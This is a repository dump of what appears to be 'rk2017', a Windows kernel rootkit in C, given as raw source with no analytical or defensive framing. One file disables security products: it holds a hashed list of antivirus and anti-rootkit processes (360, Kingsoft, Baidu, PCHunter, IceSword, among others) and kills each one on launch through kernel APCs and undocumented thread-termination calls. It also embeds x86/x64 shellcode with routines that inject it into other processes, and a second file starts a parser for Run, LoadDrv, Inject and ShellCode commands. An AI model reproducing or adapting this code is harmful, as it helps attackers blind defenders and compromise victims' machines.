https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/Vfs/Vfs.vcproj -------------------------------------------------------------------------------- /Vfs/Vfs.vcproj.Seh_Cracker-PC.Seh_Cracker.user: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | 11 | 35 | 36 | 39 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /Vfs/targetver.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/Vfs/targetver.h -------------------------------------------------------------------------------- /rk/ApcKillProcess.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "InitializeInjectRelevantInfo.h" 3 | #include "ToolFnc.h" 4 | #include "Utils.h" 5 | #include "ApcKillProcess.h" 6 | 7 | BOOLEAN g_bInjectProcessFlag = 0; 8 | BOOLEAN g_bExplorerLoader = 0; 9 | HANDLE g_InjectProcessId = 0; 10 | PVOID g_pInjectBuffer = NULL; 11 | HANDLE g_hExplorerProcessId = NULL; 12 | 13 | 14 | PKAPC pApc = NULL; 15 | #define KILL_PROCESS_NUM 19 16 | ULONG g_KillListProcess[KILL_PROCESS_NUM] = 17 | { 18 | 0x14a503ca, //360tray.exe 19 | 0x13e003a9, //360safe.exe 20 | 0x0cb602e1, //360sd.exe 21 | 0x0cec02ec, //360rp.exe 22 | 0x403706fa, //zhudongfangyu.exe 23 | 0x16c7040c, //qqpccrtp.exe 24 | 0x1f9d04c7, //ksafesvc.exe 25 | 0x12c903cb, //ksafetray.exe 26 | 0x30c6060d, //baidusdtray.exe 27 | 0x306c0605, //baiduantray.exe 28 | 0x29d2058c, //badduansvc.exe 29 | 0x2455052a, //baiduhips.exe 30 | 0x378d0677, //baiduprotect.exe 31 | 0x12da03a9, //xuetr.exe 32 | 0x292a053f, //pchunter32.exe 33 | 0x29460544, //pchunter64.exe 34 | 0x269d055c, //powertool.exe 35 | 0x1fd304d1, //icesword.exe 36 | 0x314905a2 //uddmey55LO5o.exe 37 | }; 38 | 39 | //PVOID g_pInjectShellCode = NULL; 40 | #ifndef _WIN64 41 | ULONG g_ulInjectShellCodeLength = 224; 42 | unsigned char g_pInjectShellCode[224] = { 43 | 0x60, 0xFC, 0x89, 0xE5, 0xE8, 0x90, 0x00, 0x00, 0x00, 0x8B, 0x5E, 0x3C, 0x01, 0xF3, 0xE8, 0x17, 44 | 0x00, 0x00, 0x00, 0x55, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5D, 0x83, 0xED, 0x19, 0x6A, 0x00, 0xFF, 45 | 0x95, 0xD6, 0x00, 0x00, 0x00, 0xE9, 0xB0, 0x00, 0x00, 0x00, 0x60, 0x8B, 0x53, 0x78, 0x01, 0xF2, 46 | 0x31, 0xDB, 0x8B, 0x4A, 0x20, 0x01, 0xF1, 0x8B, 0x42, 0x1C, 0x01, 0xF0, 0x8B, 0x7A, 0x18, 0x8B, 47 | 0x6A, 0x24, 0x01, 0xF5, 0x8B, 0x11, 0x01, 0xF2, 0x50, 0x53, 0x66, 0x8B, 0x5C, 0x5D, 0x00, 0x81, 48 | 0xE3, 0xFF, 0xFF, 0x00, 0x00, 0x8B, 0x04, 0x98, 0x01, 0xF0, 0xE8, 0x0B, 0x00, 0x00, 0x00, 0x5B, 49 | 0x58, 0x83, 0xC1, 0x04, 0x43, 0x4F, 0x75, 0xDC, 0x61, 0xC3, 0x60, 0x89, 0xC3, 0xE8, 0x3C, 0x00, 50 | 0x00, 0x00, 0x89, 0xC2, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5D, 0x83, 0xED, 0x79, 0x8D, 0xB5, 0xCE, 51 | 0x00, 0x00, 0x00, 0x8D, 0xBD, 0xD2, 0x00, 0x00, 0x00, 0x83, 0xC7, 0x04, 0xAD, 0x85, 0xC0, 0x74, 52 | 0x06, 0x39, 0xD0, 0x75, 0xF4, 0x89, 0x1F, 0x61, 0xC3, 0xBA, 0x30, 0x00, 0x00, 0x00, 0x64, 0x8B, 53 | 0x32, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C, 0xAD, 0x8B, 0x30, 0x8B, 0x76, 0x18, 0xC3, 0x51, 0x53, 54 | 0x52, 0x31, 0xC9, 0x31, 0xC0, 0x31, 0xDB, 0x40, 0x8A, 0x0A, 0x84, 0xC9, 0x74, 0x07, 0x01, 0xC8, 55 | 0x01, 0xC3, 0x42, 0xEB, 0xF3, 0xC1, 0xE3, 0x10, 0x09, 0xD8, 0x5A, 0x5B, 0x59, 0xC3, 0x7A, 0x04, 56 | 0x1E, 0x1A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x89, 0xEC, 0x61, 0xC2, 0x0C, 0x00 57 | }; 58 | #else 59 | ULONG g_ulInjectShellCodeLength = 308; 60 | unsigned char g_pInjectShellCode[308] = { 61 | 0x53, 0x55, 0x57, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x89, 0xE5, 0x48, 62 | 0x83, 0xE4, 0xF0, 0xE8, 0x21, 0x00, 0x00, 0x00, 0x48, 0x89, 0xF0, 0xE8, 0x36, 0x00, 0x00, 0x00, 63 | 0xE8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x49, 0x83, 0xEF, 0x25, 0x31, 0xC9, 0x41, 0xFF, 0x97, 64 | 0x1C, 0x01, 0x00, 0x00, 0xE9, 0xEB, 0x00, 0x00, 0x00, 0x90, 0xB9, 0x60, 0x00, 0x00, 0x00, 0x65, 65 | 0x48, 0x8B, 0x31, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 0x30, 0x48, 0x8B, 0x36, 0x48, 0x8B, 66 | 0x36, 0x48, 0x8B, 0x76, 0x10, 0xC3, 0x55, 0x48, 0x89, 0xC6, 0x8B, 0x4E, 0x3C, 0x48, 0x01, 0xF1, 67 | 0x8B, 0x91, 0x88, 0x00, 0x00, 0x00, 0x48, 0x01, 0xF2, 0x51, 0x8B, 0x4A, 0x20, 0x48, 0x01, 0xF1, 68 | 0x44, 0x8B, 0x72, 0x1C, 0x49, 0x01, 0xF6, 0x8B, 0x7A, 0x18, 0x8B, 0x6A, 0x24, 0x48, 0x01, 0xF5, 69 | 0x4D, 0x31, 0xC0, 0x8B, 0x11, 0x48, 0x01, 0xF2, 0x66, 0x42, 0x8B, 0x5C, 0x45, 0x00, 0x81, 0xE3, 70 | 0xFF, 0xFF, 0x00, 0x00, 0x41, 0x8B, 0x04, 0x9E, 0x48, 0x01, 0xF0, 0xE8, 0x0E, 0x00, 0x00, 0x00, 71 | 0x48, 0x83, 0xC1, 0x04, 0x49, 0xFF, 0xC0, 0xFF, 0xCF, 0x75, 0xD8, 0x5A, 0x5D, 0xC3, 0xE8, 0x3A, 72 | 0x00, 0x00, 0x00, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5F, 0x49, 0x81, 0xEF, 0xB8, 0x00, 0x00, 73 | 0x00, 0x4D, 0x8D, 0x9F, 0x14, 0x01, 0x00, 0x00, 0x4D, 0x8D, 0xAF, 0x1C, 0x01, 0x00, 0x00, 0x49, 74 | 0xC7, 0xC4, 0xFC, 0xFF, 0xFF, 0xFF, 0x49, 0x83, 0xC4, 0x04, 0x43, 0x83, 0x3C, 0x23, 0x00, 0x74, 75 | 0x0B, 0x47, 0x39, 0x0C, 0x23, 0x75, 0xEF, 0x4B, 0x89, 0x44, 0x65, 0x00, 0xC3, 0x45, 0x31, 0xC9, 76 | 0x45, 0x31, 0xD2, 0x41, 0xFF, 0xC1, 0x45, 0x31, 0xDB, 0x44, 0x8A, 0x1A, 0x45, 0x84, 0xDB, 0x74, 77 | 0x0B, 0x45, 0x01, 0xD9, 0x45, 0x01, 0xCA, 0x48, 0xFF, 0xC2, 0xEB, 0xED, 0x41, 0xC1, 0xE2, 0x10, 78 | 0x45, 0x09, 0xD1, 0xC3, 0x97, 0x04, 0x81, 0x1D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 79 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xEC, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 80 | 0x5F, 0x5D, 0x5B, 0xC3 81 | }; 82 | #endif 83 | 84 | VOID InjectMonitorThread(PVOID StartContext) 85 | { 86 | PVOID pEProcess,pCurProc; 87 | KAPC_STATE ApcState; 88 | BOOLEAN bIsAttached; 89 | NTSTATUS Status; 90 | SIZE_T AllocateLength; 91 | 92 | Status = STATUS_SUCCESS; 93 | bIsAttached = FALSE; 94 | AllocateLength = g_ulInjectShellCodeLength; 95 | 96 | pEProcess = NULL; 97 | if (PsLookupProcessByProcessId((HANDLE)StartContext,(PEPROCESS *)&pEProcess) >= 0) 98 | { 99 | if (pEProcess) 100 | { 101 | pCurProc = IoGetCurrentProcess(); 102 | if (pEProcess != pCurProc) 103 | { 104 | KeStackAttachProcess(pEProcess,&ApcState); 105 | bIsAttached = TRUE; 106 | } 107 | #ifndef _WIN64 108 | Status = ZwAllocateVirtualMemory((HANDLE)0xFFFFFFFF, \ 109 | &g_pInjectBuffer, \ 110 | 0, \ 111 | &AllocateLength, \ 112 | MEM_RESERVE | MEM_COMMIT, \ 113 | 0x40); 114 | #else 115 | Status = ZwAllocateVirtualMemory((HANDLE)0xFFFFFFFFFFFFFFFF, \ 116 | &g_pInjectBuffer, \ 117 | 0, \ 118 | &AllocateLength, \ 119 | /*0x3000, \*/ 120 | MEM_COMMIT, 121 | 0x40); 122 | 123 | #endif 124 | if (NT_SUCCESS(Status)) 125 | { 126 | memcpy((PCHAR)g_pInjectBuffer,(PCHAR)g_pInjectShellCode,g_ulInjectShellCodeLength); 127 | } 128 | if (bIsAttached) 129 | { 130 | KeUnstackDetachProcess(&ApcState); 131 | } 132 | PsTerminateSystemThread(0xFFFFFFFF); 133 | } 134 | } 135 | } 136 | void KernelRoutine(PKAPC *Apc, \ 137 | PVOID *NormalRoutine, \ 138 | PVOID *NormalContext, \ 139 | PVOID *SystemArgument1, \ 140 | PVOID *SystemArgument2) 141 | { 142 | if (pApc) 143 | { 144 | ExFreePoolWithTag(pApc,'vdkF'); 145 | pApc = NULL; 146 | } 147 | //PsRemoveLoadImageNotifyRoutine(InjectNotifyRoutine); 148 | return; 149 | } 150 | BOOLEAN InsertApc(PVOID pShellCode,PKAPC pApc) 151 | { 152 | PVOID pKThread; 153 | BOOLEAN bRet; 154 | 155 | bRet = FALSE; 156 | 157 | pKThread = KeGetCurrentThread(); 158 | KeInitializeApc((PRKAPC)pApc, \ 159 | (PRKTHREAD)pKThread, \ 160 | (KAPC_ENVIRONMENT)NULL, \ 161 | (PKKERNEL_ROUTINE)KernelRoutine, \ 162 | NULL, \ 163 | pShellCode, \ 164 | UserMode, \ 165 | NULL); 166 | bRet = KeInsertQueueApc(pApc,(PVOID)NULL,(PVOID)NULL,(LONG)0); 167 | //bRet = KeAlertThread(pKThread,UserMode); 168 | return bRet; 169 | } 170 | BOOLEAN InjectProcess(HANDLE hProcessId) 171 | { 172 | HANDLE hThread; 173 | NTSTATUS Status; 174 | PVOID pThreadObject; 175 | BOOLEAN bRet; 176 | 177 | bRet = FALSE; 178 | Status = STATUS_SUCCESS; 179 | pThreadObject = NULL; 180 | 181 | Status = PsCreateSystemThread(&hThread, \ 182 | 0x1FFFFF, \ 183 | NULL, \ 184 | 0, \ 185 | NULL, \ 186 | InjectMonitorThread, \ 187 | hProcessId); 188 | if (NT_SUCCESS(Status)) 189 | { 190 | Status = ObReferenceObjectByHandle(hThread, \ 191 | 0x1FFFFF, \ 192 | NULL, \ 193 | 0, \ 194 | &pThreadObject, \ 195 | NULL); 196 | if (NT_SUCCESS(Status)) 197 | { 198 | KeWaitForSingleObject(pThreadObject, \ 199 | Executive, \ 200 | KernelMode, \ 201 | FALSE, \ 202 | 0); 203 | ObDereferenceObject(pThreadObject); 204 | bRet = TRUE; 205 | } 206 | ZwClose(hThread); 207 | } 208 | return bRet; 209 | } 210 | 211 | VOID InjectNotifyRoutine(PUNICODE_STRING FullImageName,HANDLE ProcessId,PIMAGE_INFO ImageInfo) 212 | { 213 | PUCHAR pImageName; 214 | NTSTATUS Status; 215 | PVOID pCurProc; 216 | 217 | Status = STATUS_SUCCESS; 218 | pImageName = NULL; 219 | 220 | if (g_bInjectProcessFlag) 221 | { 222 | //PsRemoveLoadImageNotifyRoutine(InjectNotifyRoutine); 223 | return; 224 | } 225 | Status = PsLookupProcessByProcessId(ProcessId,(PEPROCESS*)&pCurProc); 226 | if (NT_SUCCESS(Status)) 227 | { 228 | pImageName = PsGetProcessImageFileName(pCurProc); 229 | if (pImageName) 230 | { 231 | if (strncmp(pImageName,"xuetr",strlen("xuetr")) == 0) 232 | { 233 | KillProcessWithApc(pCurProc); 234 | //System_Sleep(WAIT_ONE_MINUTE); 235 | //InjectProcess(ProcessId); 236 | //if (g_pInjectBuffer == NULL) 237 | //{ 238 | // return; 239 | //} 240 | //if (NULL == pApc) 241 | //{ 242 | // pApc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool,sizeof(KAPC),'vdkF'); 243 | // if (pApc == NULL) 244 | // { 245 | // return; 246 | // } 247 | //} 248 | //if (InsertApc(g_pInjectBuffer,pApc)) 249 | //{ 250 | // g_bInjectProcessFlag = TRUE; 251 | //} 252 | } 253 | } 254 | } 255 | return; 256 | } 257 | void CreateProcessRoutine(HANDLE ParentId,HANDLE ProcessId,BOOLEAN Create) 258 | { 259 | PUCHAR pImageName; 260 | PVOID pCurProc; 261 | NTSTATUS Status; 262 | ULONG ulHashValue; 263 | ULONG uli; 264 | 265 | pCurProc = NULL; 266 | pImageName = NULL; 267 | ulHashValue = 0; 268 | 269 | Status = STATUS_SUCCESS; 270 | pImageName = NULL; 271 | 272 | Status = PsLookupProcessByProcessId(ProcessId,(PEPROCESS*)&pCurProc); 273 | if (NT_SUCCESS(Status)) 274 | { 275 | pImageName = PsGetProcessImageFileName(pCurProc); 276 | if (pImageName) 277 | { 278 | _strlwr_d(pImageName); 279 | ulHashValue = CalcHashValue(pImageName); 280 | if (Create) 281 | { 282 | for (uli = 0;uli < KILL_PROCESS_NUM;uli++) 283 | { 284 | if (ulHashValue == g_KillListProcess[uli]) 285 | { 286 | KillProcessWithApc(pCurProc); 287 | break; 288 | } 289 | } 290 | } 291 | if (ulHashValue == 0x208604e2) //explorer.exe 292 | { 293 | if (Create) 294 | { 295 | g_hExplorerProcessId = ProcessId; 296 | g_Rk2017RunTimeLibrary.bIsStartFilter = TRUE; 297 | } 298 | else 299 | { 300 | g_hExplorerProcessId = NULL; 301 | g_Rk2017RunTimeLibrary.bIsStartFilter = FALSE; 302 | } 303 | } 304 | } 305 | if (pCurProc) 306 | { 307 | ObDereferenceObject(pCurProc); 308 | } 309 | } 310 | } 311 | PVOID SearchHexCodeFromAddress(PVOID pAddress) 312 | { 313 | PUCHAR pSearch; 314 | ULONG uli,ulOffset; 315 | PVOID pRetAddress; 316 | 317 | 318 | if (NULL == pAddress) 319 | { 320 | return NULL; 321 | } 322 | pSearch = (PUCHAR)pAddress; 323 | for (uli = 0;uli < 0x5A;uli++) 324 | { 325 | if (MmIsAddressValid((PVOID)((ULONG)pSearch + uli)) && \ 326 | pSearch[uli] == 0xE8) 327 | { 328 | if (pSearch[uli - 1] == 0x01 && pSearch[uli - 2] == 0x6A) 329 | { 330 | if (MmIsAddressValid((ULONG*)((ULONG)pSearch + uli + 1))) 331 | { 332 | ulOffset = *(ULONG*)((ULONG)pSearch + uli + 1); 333 | if (MmIsAddressValid((PVOID)(((ULONG)pSearch + uli) + ulOffset + 5))) 334 | { 335 | pRetAddress = (PVOID)(((ULONG)pSearch + uli) + ulOffset + 5); 336 | return pRetAddress; 337 | } 338 | } 339 | return NULL; 340 | } 341 | else if (pSearch[uli - 1 - 3] == 0x01 && pSearch[uli - 1 - 4] == 0x6A) 342 | { 343 | if (MmIsAddressValid((ULONG*)((ULONG)pSearch + uli + 1))) 344 | { 345 | ulOffset = *(ULONG*)((ULONG)pSearch + uli + 1); 346 | if (MmIsAddressValid((PVOID)(((ULONG)pSearch + uli) + ulOffset + 5))) 347 | { 348 | pRetAddress = (PVOID)(((ULONG)pSearch + uli) + ulOffset + 5); 349 | return pRetAddress; 350 | } 351 | } 352 | return NULL; 353 | } 354 | else if (pSearch[uli - 1 - 4] == 0x01 && pSearch[uli - 1 - 5] == 0x6A) 355 | { 356 | if (MmIsAddressValid((ULONG*)((ULONG)pSearch + uli + 1))) 357 | { 358 | ulOffset = *(ULONG*)((ULONG)pSearch + uli + 1); 359 | if (MmIsAddressValid((PVOID)(((ULONG)pSearch + uli) + ulOffset + 5))) 360 | { 361 | pRetAddress = (PVOID)(((ULONG)pSearch + uli) + ulOffset + 5); 362 | return pRetAddress; 363 | } 364 | } 365 | return NULL; 366 | } 367 | else 368 | { 369 | if (pSearch[uli - 1] == 0x50) 370 | { 371 | if (MmIsAddressValid((ULONG*)((ULONG)pSearch + uli + 1))) 372 | { 373 | ulOffset = *(ULONG*)((ULONG)pSearch + uli + 1); 374 | if (MmIsAddressValid((PVOID)(((ULONG)pSearch + uli) + ulOffset + 5))) 375 | { 376 | pRetAddress = (PVOID)(((ULONG)pSearch + uli) + ulOffset + 5); 377 | return pRetAddress; 378 | } 379 | } 380 | } 381 | } 382 | } 383 | } 384 | return NULL; 385 | } 386 | #ifndef _WIN64 387 | 388 | VOID KillProcessWithApc(PVOID pEProc) 389 | { 390 | PVOID pExitEThread; 391 | PRKAPC pExitApc; 392 | PLIST_ENTRY pThreadHead,pCurThreadList; 393 | 394 | pExitEThread = NULL; 395 | pExitApc = NULL; 396 | pThreadHead = NULL; 397 | pCurThreadList = NULL; 398 | 399 | pThreadHead = (PVOID)((ULONG_PTR)pEProc + g_InjectRelevantOffset.ulOffsetThreadListHead); 400 | pCurThreadList = pThreadHead->Flink; 401 | while (pThreadHead != pCurThreadList) 402 | { 403 | pExitEThread = (PVOID)((ULONG_PTR)pCurThreadList - g_InjectRelevantOffset.ulOffsetThreadListEntry); 404 | if (pExitEThread) 405 | { 406 | do 407 | { 408 | pExitApc = ExAllocatePool(NonPagedPool,sizeof(KAPC)); 409 | } while (pExitApc == NULL); 410 | RtlZeroMemory(pExitApc,sizeof(KAPC)); 411 | KeInitializeApc(pExitApc, 412 | (PKTHREAD)pExitEThread, 413 | OriginalApcEnvironment, 414 | (PVOID)ApcKillThreadRoutine, 415 | NULL, 416 | NULL, 417 | KernelMode, 418 | NULL); 419 | KeInsertQueueApc(pExitApc,NULL,NULL,2); 420 | } 421 | pCurThreadList = pCurThreadList->Flink; 422 | } 423 | return; 424 | } 425 | VOID ApcKillThreadRoutine(PVOID pApc, \ 426 | PVOID *NormalRoutine, \ 427 | PVOID *NormalContext, \ 428 | PVOID *SystemArgument1, \ 429 | PVOID *SystemArgument2) 430 | { 431 | PVOID pEThread; 432 | 433 | pEThread = NULL; 434 | DbgPrint("ApcKillThreadRoutine\n"); 435 | if (pApc) 436 | { 437 | ExFreePool(pApc); 438 | } 439 | 440 | pEThread = KeGetCurrentThread(); 441 | if (MmIsAddressValid(g_InjectRelevantOffset.PspTerminateThreadByPointer) && \ 442 | NULL != g_InjectRelevantOffset.PspTerminateThreadByPointer) 443 | { 444 | if (g_InjectRelevantOffset.WindowsVersion.bIsWindowsXp) 445 | { 446 | PspTerminateThreadByPointerForWindowsXpx86(pEThread,STATUS_SUCCESS,TRUE); 447 | } 448 | else if (g_InjectRelevantOffset.WindowsVersion.bIsWindows7 && \ 449 | FALSE == g_InjectRelevantOffset.WindowsVersion.bIs64Bit) 450 | { 451 | g_InjectRelevantOffset.PspTerminateThreadByPointer(pEThread,STATUS_SUCCESS,TRUE); 452 | } 453 | else if (g_InjectRelevantOffset.WindowsVersion.bIsWindows8 && \ 454 | FALSE == g_InjectRelevantOffset.WindowsVersion.bIs64Bit) 455 | { 456 | PspTerminateThreadByPointerForWindows8x86(pEThread,STATUS_SUCCESS,TRUE); 457 | } 458 | else if (g_InjectRelevantOffset.WindowsVersion.bIsWindows81 && \ 459 | FALSE == g_InjectRelevantOffset.WindowsVersion.bIs64Bit) 460 | { 461 | PspTerminateThreadByPointerForWindows81x86(pEThread,STATUS_SUCCESS,TRUE); 462 | } 463 | else if (g_InjectRelevantOffset.WindowsVersion.bIsWindows10 && \ 464 | FALSE == g_InjectRelevantOffset.WindowsVersion.bIs64Bit) 465 | { 466 | PspTerminateThreadByPointerForWindows10x86(pEThread,STATUS_SUCCESS,TRUE); 467 | } 468 | else 469 | { 470 | 471 | } 472 | } 473 | return; 474 | } 475 | __declspec(naked) NTSTATUS PspTerminateThreadByPointerForWindows8x86(PVOID pEThread, \ 476 | NTSTATUS ExitStatus, \ 477 | BOOLEAN DirectTerminate) 478 | { 479 | __asm 480 | { 481 | mov edi,edi 482 | push ebp 483 | mov ebp,esp 484 | push edi 485 | mov edi,pEThread 486 | or dword ptr [edi + 0x58],0x1000 //set system flag 487 | test dword ptr[edi + 0x58],0x1000 488 | jz __PsTerminateThreadForWin8RetValue 489 | push 1 490 | push ExitStatus 491 | call g_InjectRelevantOffset.PspTerminateThreadByPointer 492 | jmp __PsTerminateThreadForWin8Ret 493 | __PsTerminateThreadForWin8RetValue: 494 | mov eax,0xC000000D 495 | __PsTerminateThreadForWin8Ret: 496 | pop edi 497 | pop ebp 498 | ret 0x0C 499 | } 500 | } 501 | __declspec(naked) NTSTATUS PspTerminateThreadByPointerForWindows81x86(PVOID pEThread, \ 502 | NTSTATUS ExitStatus, \ 503 | BOOLEAN DirectTerminate) 504 | { 505 | __asm 506 | { 507 | mov edi,edi 508 | push ebp 509 | mov ebp,esp 510 | mov ecx,pEThread 511 | or dword ptr [ecx + 0x58],0x800 512 | test dword ptr[ecx + 0x58],0x800 513 | jz __PsTerminateThreadForWin81RetValue 514 | mov edx,ExitStatus 515 | push 1 516 | call g_InjectRelevantOffset.PspTerminateThreadByPointer 517 | jmp __PsTerminateThreadForWin81Ret 518 | __PsTerminateThreadForWin81RetValue: 519 | mov eax,0xC000000D 520 | __PsTerminateThreadForWin81Ret: 521 | pop ebp 522 | ret 0x0C 523 | } 524 | } 525 | __declspec(naked) NTSTATUS PspTerminateThreadByPointerForWindows10x86(PVOID pEThread, \ 526 | NTSTATUS ExitStatus, \ 527 | BOOLEAN DirectTerminate) 528 | { 529 | __asm 530 | { 531 | mov edi,edi 532 | push ebp 533 | mov ebp,esp 534 | push ecx 535 | mov ecx,pEThread 536 | or dword ptr [ecx + 0x58],0x400 537 | test dword ptr[ecx + 0x58],0x400 538 | jz __PsTerminateThreadForWin10RetValue 539 | mov edx,ExitStatus 540 | push 1 541 | call g_InjectRelevantOffset.PspTerminateThreadByPointer 542 | jmp __PsTerminateThreadForWin10Ret 543 | __PsTerminateThreadForWin10RetValue: 544 | mov eax,0xC000000D 545 | __PsTerminateThreadForWin10Ret: 546 | pop ecx 547 | pop ebp 548 | ret 0x0C 549 | } 550 | } 551 | __declspec(naked) NTSTATUS PspTerminateThreadByPointerForWindowsXpx86(PVOID pEThread, \ 552 | NTSTATUS ExitStatus, \ 553 | BOOLEAN DirectTerminate) 554 | { 555 | __asm 556 | { 557 | mov edi,edi 558 | push ebp 559 | mov ebp,esp 560 | mov eax,pEThread 561 | or dword ptr [eax + 0x248],0x10 562 | test dword ptr[eax + 0x248],0x10 563 | jz __PsTerminateThreadForWinXpRetValue 564 | push ExitStatus 565 | push eax 566 | call g_InjectRelevantOffset.PspTerminateThreadByPointer 567 | jmp __PsTerminateThreadForWinXpRet 568 | __PsTerminateThreadForWinXpRetValue: 569 | mov eax,0xC000000D 570 | __PsTerminateThreadForWinXpRet: 571 | pop ebp 572 | ret 0x0C 573 | } 574 | } 575 | 576 | 577 | 578 | #endif -------------------------------------------------------------------------------- /rk/ApcKillProcess.h: -------------------------------------------------------------------------------- 1 | #ifndef __APC_KILL_PROCESS_H__ 2 | #define __APC_KILL_PROCESS_H__ 3 | 4 | 5 | #ifndef _WIN64 6 | VOID ApcKillThreadRoutine(PVOID pApc, \ 7 | PVOID *NormalRoutine, \ 8 | PVOID *NormalContext, \ 9 | PVOID *SystemArgument1, \ 10 | PVOID *SystemArgument2); 11 | 12 | VOID KillProcessWithApc(PVOID pEProc); 13 | 14 | NTSTATUS PspTerminateThreadByPointerForWindows8x86(PVOID pEThread, \ 15 | NTSTATUS ExitStatus, \ 16 | BOOLEAN DirectTerminate); 17 | NTSTATUS PspTerminateThreadByPointerForWindows81x86(PVOID pEThread, \ 18 | NTSTATUS ExitStatus, \ 19 | BOOLEAN DirectTerminate); 20 | NTSTATUS PspTerminateThreadByPointerForWindows10x86(PVOID pEThread, \ 21 | NTSTATUS ExitStatus, \ 22 | BOOLEAN DirectTerminate); 23 | NTSTATUS PspTerminateThreadByPointerForWindowsXpx86(PVOID pEThread, \ 24 | NTSTATUS ExitStatus, \ 25 | BOOLEAN DirectTerminate); 26 | #endif 27 | 28 | PVOID SearchHexCodeFromAddress(PVOID pAddress); 29 | VOID InjectNotifyRoutine(PUNICODE_STRING FullImageName,HANDLE ProcessId,PIMAGE_INFO ImageInfo); 30 | void CreateProcessRoutine(HANDLE ParentId,HANDLE ProcessId,BOOLEAN Create); 31 | BOOLEAN InjectProcess(HANDLE hProcessId); 32 | BOOLEAN InsertApc(PVOID pShellCode,PKAPC pApc); 33 | 34 | extern HANDLE g_hExplorerProcessId; 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /rk/CommandLine.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "Utils.h" 3 | #include "CommandLine.h" 4 | 5 | LIST_ENTRY g_CommandListPack; 6 | KSPIN_LOCK g_CommandListSpinLock; 7 | 8 | 9 | PCHAR GetNextCmdLine(PCHAR pCmdLineA,PBOOLEAN pbIsEnd) 10 | { 11 | PCHAR pTmpCmd; 12 | 13 | if (NULL == pCmdLineA) 14 | { 15 | return NULL; 16 | } 17 | pCmdLineA = MyStrChr(pCmdLineA,':'); 18 | if (pCmdLineA) 19 | { 20 | pCmdLineA[0] = '\0'; 21 | pCmdLineA += 1; 22 | pTmpCmd = MyStrChr(pCmdLineA,':'); 23 | if (NULL == pTmpCmd) 24 | { 25 | pTmpCmd = MyStrChr(pCmdLineA,';'); 26 | if (pTmpCmd) 27 | { 28 | pTmpCmd[0] = '\0'; 29 | *pbIsEnd = TRUE; 30 | } 31 | } 32 | pTmpCmd[0] = '\0'; 33 | } 34 | return pCmdLineA; 35 | } 36 | 37 | COMMAND_LINE_TYPE GetCommandLineType(PCHAR pCmdLineA) 38 | { 39 | if (__STRNCMPI__(pCmdLineA,"Run",__STRLEN__("Run")) == 0) 40 | { 41 | return CmdRun; 42 | } 43 | else if (__STRNCMPI__(pCmdLineA,"LoadDrv",__STRLEN__("LoadDrv")) == 0) 44 | { 45 | return LoadDrv; 46 | } 47 | else if (__STRNCMPI__(pCmdLineA,"Inject",__STRLEN__("Inject")) == 0) 48 | { 49 | return Inject; 50 | } 51 | else if (__STRNCMPI__(pCmdLineA,"ShellCode",__STRLEN__("ShellCode")) == 0) 52 | { 53 | return ShellCode; 54 | } 55 | else 56 | { 57 | return ShellCode; 58 | } 59 | } 60 | FILE_TYPE_SUFFIX GetFileSuffixType(PCHAR pSuffixType) 61 | { 62 | if (__STRNCMPI__(pSuffixType,"Exe",__STRLEN__("Exe")) == 0) 63 | { 64 | return FileTypeExe; 65 | } 66 | else if (__STRNCMPI__(pSuffixType,"Dll",__STRLEN__("Dll")) == 0) 67 | { 68 | return FileTypeDll; 69 | } 70 | else if (__STRNCMPI__(pSuffixType,"Sys",__STRLEN__("Sys")) == 0) 71 | { 72 | return FileTypeSys; 73 | } 74 | else if (__STRNCMPI__(pSuffixType,"Elf",__STRLEN__("Elf")) == 0) 75 | { 76 | return FileTypeElf; 77 | } 78 | else if (__STRNCMPI__(pSuffixType,"So",__STRLEN__("So")) == 0) 79 | { 80 | return FileTypeSo; 81 | } 82 | else if (__STRNCMPI__(pSuffixType,"Bin",__STRLEN__("Bin")) == 0) 83 | { 84 | return FileTypeBin; 85 | } 86 | else 87 | { 88 | return FileTypeBin; 89 | } 90 | } 91 | SYSTEM_TYPE GetSystemType(PCHAR pSystemA) 92 | { 93 | if (__STRNCMPI__(pSystemA,"Windows",__STRLEN__("Windows")) == 0) 94 | { 95 | return Windows; 96 | } 97 | else if (__STRNCMPI__(pSystemA,"MacOs",__STRLEN__("MacOs")) == 0) 98 | { 99 | return MacOs; 100 | } 101 | else if (__STRNCMPI__(pSystemA,"Linux",__STRLEN__("Linux")) == 0) 102 | { 103 | return Linux; 104 | } 105 | else if (__STRNCMPI__(pSystemA,"CentOs",__STRLEN__("CentOs")) == 0) 106 | { 107 | return CentOs; 108 | } 109 | else if (__STRNCMPI__(pSystemA,"FreeBSD",__STRLEN__("FreeBSD")) == 0) 110 | { 111 | return FreeBSD; 112 | } 113 | else 114 | { 115 | return Unknow; 116 | } 117 | } 118 | void ParseCommandLine(PCHAR pCmdLineA,PCOMMAND_LINE_PACK *ppCmdLinePack) 119 | { 120 | PCHAR pCurCmd; 121 | PCHAR pLocalDat; 122 | BOOLEAN bIsEnd; 123 | 124 | pLocalDat = NULL; 125 | bIsEnd = FALSE; 126 | 127 | if (NULL == pCmdLineA || NULL == *ppCmdLinePack) 128 | { 129 | return; 130 | } 131 | do 132 | { 133 | pLocalDat = KernelMalloc(__STRLEN__(pCmdLineA)); 134 | } while (NULL == pLocalDat); 135 | RtlZeroMemory(pLocalDat,__STRLEN__(pCmdLineA)); 136 | 